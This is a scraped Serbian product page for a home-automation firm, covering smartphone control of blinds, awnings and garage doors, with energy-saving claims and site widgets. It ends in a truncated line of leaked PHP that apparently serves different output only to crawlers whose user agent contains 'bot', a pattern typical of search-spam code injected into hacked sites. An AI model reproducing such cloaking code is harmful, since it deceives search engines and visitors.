Roletne, tende, garaža


Upravljanje roletnama, tendama i zavesama utiče na energetsku efikasnost, jer može uštedeti od 30% do 50% energije na hlađenju i grejanju. Da bi se upravljalo, potrebno je da postoje odgovarajući motori. Ambijent se prilagođava trenutnim potrebama, jednostavno, povećavajući komfor, udobnost i praktičnost, iz objekta ili udaljene lokacije, na više načina. Spuštanje ili dizanje roletni, tendi i zavesa, može biti pojedinačno ili implementirano u programske scenarije - makroe, sa drugim uređajima.

Zatvaranje roletni u sumrak smanjuje gubitak topline kroz prozore u zimskim mesecima, odnosno sprečava ulaz toplote u dom u letnjim mesecima. Na taj način, može se uštedeti do 15% godišnje na troškovima grejanja i hlađenja.

Ako korisnik ima roletne, tende ili garažna vrata na motorni pogon, može ih kontrolisati mobilnim telefonom kao daljinskim upravljačem.

Inovativno rešenje Tesla sistema automatizacije povezuje i kontroliše gotovo sve tehničke sisteme u domu ili kancelariji i omogućava upravljanje njima putem smartphone-a s bilo kog mesta na svetu.

LOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »

$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo '